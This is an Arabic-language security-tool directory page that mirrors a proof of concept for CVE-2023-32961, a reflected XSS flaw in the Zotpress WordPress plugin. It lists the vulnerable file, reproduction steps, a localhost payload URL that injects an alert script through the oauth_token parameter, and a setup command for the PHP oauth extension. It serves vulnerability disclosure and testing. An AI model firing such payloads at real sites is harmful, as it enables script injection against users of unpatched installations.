Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-32961 — PoC الخاص بـ CVE-2023-32961 | Kitploit
أدوات/GitHubGitHub/lourc0d3/cve-2023-32961
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHublourc0d3/cve-2023-32961

CVE-2023-32961

PoC الخاص بـ CVE-2023-32961

عرض المستودع
211منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-32961

هذا المستودع يتعلق بثغرة XSS في إضافة Zotpress الخاصة بووردبريس.

تفاصيل المكوّن


اسم المكوّن

Zotpress

الإصدار المعرّض للثغرة

≤ 7.3.3

معرّف المكوّن (slug)

zotpress

رابط المكوّن

https://wordpress.org/plugins/zotpress/

المتطلبات المسبقة


بدون مصادقة

تفاصيل الثغرة


وصف مختصر

الدالة get_request_token الموجودة في zotpress/lib/admin/admin.accounts.oauth.php معرّضة لهجمة XSS.

تنزيل الأداة

طريقة إعادة الإنتاج (PoC)

  1. قم بتثبيت امتداد oauth الخاص بـ PHP لتفعيل الثغرة. (هذا اختياري في Zotpress)
  2. سجّل الدخول إلى zotero.org
  3. يجب توفّر الشروط اللازمة لتنفيذ الدالة get_request_token. (لأول مرة فقط) أرسل حمولة مثل هذه: http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token=1
  4. أرسل الحمولة التالية http://localhost:8080/wp-content/plugins/zotpress/lib/admin/admin.accounts.oauth.php?return_uri=http://localhost:8080&oauth_token="><script>alert(1)</script>

معلومات إضافية

  • تحتاج إلى حساب على zotero.org.

  • تحتاج إلى تعيين قيمة oauthState على 1 لتفعيل الثغرة. إذا لم تعمل الحمولة أعلاه، فستحتاج إلى إيجاد طريقة لتعيين oauthState على 1.

    • التعبير الشرطي :

      root@kitploit:~
      $_GET['oauth_token'] != $state['request_token_info']['oauth_token']
      
  • سهولة تثبيت امتداد oauth الخاص بـ PHP:

    • أمر بسطر واحد :

      root@kitploit:~
      sudo su; apt-get update; apt-get -y install gcc make autoconf libc-dev pkg-config libpcre3-dev; pecl install oauth; bash -c "echo extension=oauth.so > $PHP_INI_DIR/conf.d/oauth.ini"; service apache2 restart
      
  • تم الاختبار باستخدام صورة Docker الخاصة بـ wordpress:latest.

فيديو إثبات المفهوم (PoC)

https://www.youtube.com/watch?v=5kZ7bNbs_-Q

المراجع


CVE-2023-32961